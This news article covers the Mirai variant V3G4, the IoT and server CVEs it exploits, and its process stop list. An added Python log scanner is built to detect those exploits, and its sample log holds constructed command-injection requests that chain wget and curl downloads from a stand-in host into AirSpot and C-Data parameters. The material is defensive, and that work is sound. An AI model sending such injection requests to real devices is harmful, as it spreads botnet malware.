Mirai Variant V3G4 Exploiting IoT Devices for DDoS Attacks

By Waqas. The V3G4 malware was caught leveraging several vulnerabilities in IoT devices to spread its infection between July and December 2022.

HackRead

Security researchers at Palo Alto Networks’ Unit 42 have identified a new variant of the infamous Mirai malware, the botnet behind the large-scale distributed denial-of-service (DDoS) attacks on the Dyn DNS service in October 2016.

Dubbed V3G4 by the researchers, the variant specifically targets Internet of Things (IoT) devices. Like the original Mirai botnet, V3G4 infects IoT devices by brute-forcing default login credentials (factory-set usernames and passwords).

In the campaigns tracked by Unit 42, one of the prime targets of the V3G4 malware has been exposed IP cameras. The malware enlists the compromised servers and devices into a botnet that can be used to launch DDoS attacks or to perform other malicious activities, such as stealing data or installing additional malware.

According to Unit 42’s report, researchers observed V3G4 leveraging the following vulnerabilities to spread between July and December 2022:

CVE-2019-15107: Webmin Command Injection Vulnerability
CVE-2012-4869: FreePBX Elastix Remote Command Execution Vulnerability
CVE-2020-8515: DrayTek Vigor Remote Command Execution Vulnerability
CVE-2020-15415: DrayTek Vigor Remote Command Injection Vulnerability
CVE-2022-36267: Airspan AirSpot Remote Command Execution Vulnerability
CVE-2022-26134: Atlassian Confluence Remote Code Execution Vulnerability
CVE-2022-4257: C-Data Web Management System Command Injection Vulnerability
CVE-2017-5173: Geutebruck IP Cameras Remote Command Execution Vulnerability
CVE-2014-9727: FRITZ!Box Webcam Remote Command Execution Vulnerability
Gitorious Remote Command Execution Vulnerability
Mitel AWC Remote Command Execution Vulnerability
Spree Commerce Arbitrary Command Execution Vulnerability
FLIR Thermal Camera Remote Command Execution Vulnerability

Source: Unit 42

Researchers also noted that the botnet client carries a stop list of process names: it compares the list against the names of the processes running on the compromised host and terminates any match. The listed names belong to other botnet malware families and to previously identified Mirai variants, so the bot is clearing competitors off the device before it takes it over.

V3G4’s stop list.

This should not come as a surprise, as many Mirai variants have surfaced over the years, among them MooBot, Demonbot and OMG.

The vulnerabilities mentioned above have less attack complexity than previously observed variants, but they maintain a critical security impact that can lead to remote code execution.

Palo Alto Networks – Unit 42

To protect against V3G4 and other IoT malware, follow the established hardening practices for IoT devices: change default usernames and passwords, keep firmware and software up to date with the latest security patches, and disable unnecessary services and protocols (in particular management interfaces that do not need to be reachable from the Internet). Network segmentation also helps to contain the spread of malware, and to limit the reach of a DDoS-capable bot, if a device is infected.
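The advice above is about prevention. On the detection side, the exploitation details collected on this page (the Webmin password_change.cgi endpoint, the unauthenticated AirSpot diagnostics.cgi ping handler, the hostname argument of C-Data's jumpto.php, and the OGNL expression injected into the Confluence request path) are enough to write a first-pass access-log check. The script below is an added example for this page, not Unit 42's or HackRead's code. The log lines are constructed, the query-parameter names in the AirSpot request are made up for illustration, and the Confluence probe uses a harmless ${7*7} rather than a real payload.

```python
"""Flag HTTP requests that match the exploitation patterns of the V3G4
endpoints described on this page.  Added example with constructed log lines;
the AirSpot parameter names (select_mode_ping, ping_ip) are assumptions."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Common log format: ip ident user [ts] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Shell metacharacters that turn a hostname/IP argument into a second command.
SHELL_META = re.compile(r"[;|`]|\$\(")
# OGNL expression marker used in the Confluence CVE-2022-26134 request path.
OGNL = re.compile(r"\$\{")


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return the list of findings for one parsed request (empty if benign)."""
    url = urlsplit(entry["target"])
    path = unquote(url.path)                                # %24%7B -> ${
    params = parse_qsl(url.query, keep_blank_values=True)   # decodes values
    tainted = [k for k, v in params if SHELL_META.search(v)]
    hits = []
    if OGNL.search(path):
        hits.append("CVE-2022-26134: OGNL expression in request path")
    if path.endswith("/cgi-bin/diagnostics.cgi") and tainted:
        hits.append(f"CVE-2022-36267: shell metacharacters in {tainted} "
                    "sent to AirSpot diagnostics.cgi")
    if path.endswith("/cgi-bin/jumpto.php") and "hostname" in tainted:
        hits.append("CVE-2022-4257: shell metacharacters in C-Data "
                    "jumpto.php hostname argument")
    if path.endswith("/password_change.cgi") and entry["method"] == "POST":
        # Webmin's injection lives in the POST body ('old' parameter), which
        # access logs never record, so only the endpoint itself can be flagged.
        hits.append("CVE-2019-15107: POST to Webmin password_change.cgi "
                    "(inspect request body for the 'old' parameter)")
    return hits


def scan(log_text):
    """Return [(ip, target, findings)] for every line that produced findings."""
    results = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        hits = classify(entry)
        if hits:
            results.append((entry["ip"], entry["target"], hits))
    return results


# Constructed sample log: one benign request, four probes, one clean call to
# a watched endpoint that must not be flagged.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Sep/2022:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 1043
203.0.113.11 - - [12/Sep/2022:10:01:05 +0000] "GET /cgi-bin/diagnostics.cgi?select_mode_ping=1&ping_ip=127.0.0.1%3Bwget%20http://198.51.100.7/x.sh HTTP/1.1" 200 512
203.0.113.12 - - [12/Sep/2022:10:01:09 +0000] "GET /cgi-bin/jumpto.php?hostname=198.51.100.7%7Ccurl%20-O%20http://198.51.100.7/arm7 HTTP/1.1" 200 0
203.0.113.13 - - [12/Sep/2022:10:01:14 +0000] "GET /%24%7B7*7%7D/ HTTP/1.1" 302 0
203.0.113.14 - - [12/Sep/2022:10:01:20 +0000] "POST /password_change.cgi HTTP/1.1" 200 987
203.0.113.15 - - [12/Sep/2022:10:01:25 +0000] "GET /cgi-bin/jumpto.php?hostname=192.0.2.5 HTTP/1.1" 200 0
"""

if __name__ == "__main__":
    for ip, target, hits in scan(SAMPLE_LOG):
        print(ip, target)
        for h in hits:
            print("   ", h)
```

Two caveats a practitioner should keep in mind. The check percent-decodes once, so a double-encoded payload slips past it; and, as the Webmin case shows, access logs only carry the request line, so injection through a POST body can be detected only with request-body logging or at a WAF, and the best the log can do is surface unexpected POSTs to the vulnerable endpoint.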


Related news

New Linux Malware Alert: ‘Spinning YARN’ Hits Docker, Other Key Apps

By Deeba Ahmed. Another day, another Linux malware.

Iranian Nation-State Actors Employ Password Spray Attacks Targeting Multiple Sectors

Iranian nation-state actors have been conducting password spray attacks against thousands of organizations globally between February and July 2023, new findings from Microsoft reveal. The tech giant, which is tracking the activity under the name Peach Sandstorm (formerly Holmium), said the adversary pursued organizations in the satellite, defense, and pharmaceutical sectors to likely facilitate

New Mirai Botnet Variant 'V3G4' Exploiting 13 Flaws to Target Linux and IoT Devices

A new variant of the notorious Mirai botnet has been found leveraging several security vulnerabilities to propagate itself to Linux and IoT devices. Observed during the second half of 2022, the new version has been dubbed V3G4 by Palo Alto Networks Unit 42, which identified three different campaigns likely conducted by the same threat actor. "Once the vulnerable devices are compromised, they

CVE-2022-4257: VulnHub/rce1.md at main · siriuswhiter/VulnHub

A vulnerability was found in C-DATA Web Management System. It has been rated as critical. This issue affects some unknown processing of the file cgi-bin/jumpto.php of the component GET Parameter Handler. The manipulation of the argument hostname leads to argument injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-214631.

AirSpot 5410 0.3.4.1-4 Remote Command Injection

AirSpot 5410 versions 0.3.4.1-4 and below suffer from an unauthenticated remote command injection vulnerability.

CVE-2022-36267: Airspan-AirSpot-5410.md

In Airspan AirSpot 5410 version 0.3.4.1-4 and under there exists an unauthenticated remote command injection vulnerability. The ping functionality can be called without user authentication by crafting a malicious HTTP request and injecting code into one of the parameters, allowing for remote code execution. This vulnerability is exploited via the binary file /home/www/cgi-bin/diagnostics.cgi, which accepts unauthenticated requests and unsanitized data. As a result, a malicious actor can craft a specific request and interact remotely with the device.

Atlassian Confluence Flaw Being Used to Deploy Ransomware and Crypto Miners

A recently patched critical security flaw in Atlassian Confluence Server and Data Center products is being actively weaponized in real-world attacks to drop cryptocurrency miners and ransomware payloads. In at least two of the Windows-related incidents observed by cybersecurity vendor Sophos, adversaries exploited the vulnerability to deliver Cerber ransomware and a crypto miner called z0miner

Chinese Hackers Exploited Sophos Firewall Zero-Day Flaw to Target South Asian Entity

A sophisticated Chinese advanced persistent threat (APT) actor exploited a critical security vulnerability in Sophos' firewall product that came to light earlier this year to infiltrate an unnamed South Asian target as part of a highly-targeted attack. "The attacker implement[ed] an interesting web shell backdoor, create[d] a secondary form of persistence, and ultimately launch[ed] attacks

DragonForce Gang Unleash Hacks Against Govt. of India

In response to a comment about the Prophet Mohammed, a hacktivist group in Malaysia has unleashed a wave of cyber attacks in India.

“Multiple adversaries” exploiting Confluence vulnerability, warns Microsoft

Microsoft has warned of APT groups and ransomware authors exploiting the now patched Confluence vulnerability. We take a look at the dangers.

Confluence OGNL Injection Remote Code Execution

Confluence suffers from a pre-authentication remote code execution vulnerability that is leveraged via OGNL injection. All 7.4.17 versions before 7.18.1 are affected.

Attackers Use Public Exploits to Throttle Atlassian Confluence Flaw

The vulnerability remains unpatched on many versions of the collaboration tool and has potential to create a SolarWinds-type scenario.

Atlassian Releases Patch for Confluence Zero-Day Flaw Exploited in the Wild

Atlassian on Friday rolled out fixes to address a critical security flaw affecting its Confluence Server and Data Center products that have come under active exploitation by threat actors to achieve remote code execution. Tracked as CVE-2022-26134, the issue is similar to CVE-2021-26084 — another security flaw the Australian software company patched in August 2021. Both relate to a case of

Threat Advisory: Atlassian Confluence zero-day vulnerability under active exploitation

Cisco Talos is monitoring reports of an actively exploited zero-day vulnerability in Confluence Data Center and Server. Confluence is a Java-based corporate wiki employed by numerous enterprises. At this time, it is confirmed that all supported versions of Confluence are affected by this...

Actively Exploited Atlassian Zero-Day Bug Allows Full System Takeover

A remote code execution (RCE) vulnerability in all versions of the popular Confluence collaboration platform can be abused in credential harvesting, cyber espionage, and network backdoor attacks.

Hackers Exploiting Unpatched Critical Atlassian Confluence Zero-Day Vulnerability

Atlassian has warned of a critical unpatched remote code execution vulnerability impacting Confluence Server and Data Center products that it said is being actively exploited in the wild. The Australian software company credited cybersecurity firm Volexity for identifying the flaw, which is being tracked as CVE-2022-26134. "Atlassian has been made aware of current active exploitation of a

CVE-2019-15107: Offensive Security’s Exploit Database Archive

An issue was discovered in Webmin <=1.920. The parameter old in password_change.cgi contains a command injection vulnerability.